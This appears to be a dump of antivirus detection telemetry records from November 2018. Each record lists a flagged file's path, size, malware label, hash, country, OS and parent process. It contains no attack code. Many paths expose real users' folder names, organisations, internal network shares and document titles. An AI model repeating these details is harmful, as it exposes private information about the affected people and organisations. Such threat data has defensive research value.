  Row(detection=Row(filename='avscan-20181102-062006-4f9d5320', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062006-4F9D5320', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051923-d49823a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051923-D49823A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054400-4504a0a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054400-4504A0A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054437-5ae61278', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054437-5AE61278', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053336-d0d3d309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053336-D0D3D309', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sosialisasi bpjs ketenagakerjaan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\LPA SOSIALISASI BPJS KETENAGAKERJAAN\\SOSIALISASI BPJS KETENAGAKERJAAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:41:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T07:43:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:08:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:51:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151939-1131f2e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151446-E857F837\\AVSCAN-20181101-151939-1131F2E3', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:12:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mrt0313.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\MRT0313\\MRT0313.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kekurangan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\KEKURANGAN\\KEKURANGAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154958-84c13634', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154958-84C13634', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:53:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-100539-4f942854', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3c21d6ca\\AVSCAN-20181101-095851-16A7EBA1\\AVSCAN-20181101-100539-4F942854', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160256-07d47f54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160256-07D47F54', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='\\\\Shop-mep\\SCAN\\SCAN.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='3c2908cb1415735683089ca58342f4e9ddb26f1c99735ed9e1aa3daa68dd44ea', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-01T06:46:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.vir', filepath='C:\\Windows\\System32\\MaintenancesServices.VIR', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T07:08:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155202-99aaf79a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155202-99AAF79A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154620-60118dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154620-60118DAB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105428-177f292f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105057-F1913359\\AVSCAN-20181101-105428-177F292F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155211-9b3efca7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155211-9B3EFCA7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="bulanan '14.bat", filepath="D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\LAPORAN BULANAN HRD\\LAP BULANAN '14\\BULANAN '14.bat", filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh9126.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH9126.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T23:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143006-fd23bbfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143006-FD23BBFB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:30:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='culqyw.dll', filepath='C:\\WINDOWS\\system32\\culqyw.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:13:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d7abdaf89107596c694ba23f655c3f0404731ce2dd78e95a2dbe67abf5529354', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\D7ABDAF89107596C694BA23F655C3F0404731CE2DD78E95A2DBE67ABF5529354', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d7abdaf89107596c694ba23f655c3f0404731ce2dd78e95a2dbe67abf5529354', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="setup_21 (deleted b'32c3021c45729d2989d4d4bedd537cca').htm", filepath="C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\.dropbox.cache\\2018-11-01\\setup_21 (deleted b'32c3021c45729d2989d4d4bedd537cca').htm", filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='64141040eca15e2ac3a9d1f003e1bbc6c905b43651eecb32905328be669e9937', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-01T10:22:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installs.exe', filepath='C:\\Program Files (x86)\\SolidWorks Corp\\COSMOS M\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='5cd77127651103b0252b02ac59c6d594711b4f1e1c386aa716cf3eb325a67005', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LR+zorPAlEGtGn9J.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:37:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-051847-f2c494ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5773479\\AVSCAN-20181101-051717-E31C1ABE\\AVSCAN-20181101-051847-F2C494EF', filesize=512000, name='W32/Alman.BB.#M1.#R1'), hash='6761c9525bfcfe12e0ccc48dfc02c298b478e7e3e31eaeeef81dfdfaf324b62f', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:18:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rhrwvhxqoey.dll', filepath='C:\\Windows\\Temp\\nsg36F3.tmp\\RhrWVHXqoey.dll', filesize=1344000, name='Adware/Zdengo.kykpb.#M1.#R1'), hash='79a642a6de1afadd3162f8bc38d4bab8c0835cdacc489ee0ab6523e591a1a16b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='F:\\Agus\\PortableApps\\EmsisoftEmergencyKitPortable\\App\\EmsisoftEmergencyKitPortable\\bin64\\a2emergencykit.exe', parentsize=10393728, timestamp='2018-11-01T01:33:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110806-e4e582ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110806-E4E582AD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T17:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='play.exe', filepath='h:\\العاب\\اكلة السكر جديد\\Play.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='91ad63cb2ada2cc75fc4749dc4d2c61d2931b1c3d9187824af7650faa8d697f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\75EFA335D6E6FA39037E5B8D36CB2330A618CC2B15AD2485F6296517B8E2D9E2', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:19:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124119-6c24441a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124058-59D8E978\\AVSCAN-20181101-124119-6C24441A', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:41:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='07-aircraft transit sub juli  2018.xls', filepath='\\\\192.168.1.88\\Users\\user\\Documents\\AIRCRAFT TRANSIT sta Sub 2018\\07-AIRCRAFT TRANSIT SUB JULI  2018.xls', filesize=1088000, name='X2000M/Agent.91364890.#M1.#R1'), hash='6d9769b7e80e04ca43279bcc8ca0d62cf3eb229fb623837eaef03a7fd2fccfcc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T01:42:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090908-c4811aff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49ddaa1c\\AVSCAN-20181101-090853-C0DAA557\\AVSCAN-20181101-090908-C4811AFF', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190748-0c6277f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190748-0C6277F0', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115156-7999a917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8a30e46\\AVSCAN-20181101-115134-769BF0B2\\AVSCAN-20181101-115156-7999A917', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:51:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080515-01a22c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1703d6a\\AVSCAN-20181101-074705-722B659F\\AVSCAN-20181101-080515-01A22C37', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:05:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233713-77ebdbfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e76b1e8\\AVSCAN-20181101-233645-74ADCDB0\\AVSCAN-20181101-233713-77EBDBFB', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:37:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141157-77454f20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a72d9d30\\AVSCAN-20181101-141146-750DFD81\\AVSCAN-20181101-141157-77454F20', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newhpnamsc9.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\7RESSCWK\\newHPNAMSC9.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f017c98a0589fdf274a5d1d06f2e639b87215010d6ee79f2366372a8941061f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:26:57Z'), dt=datetime.date(2018, 11, 1)),
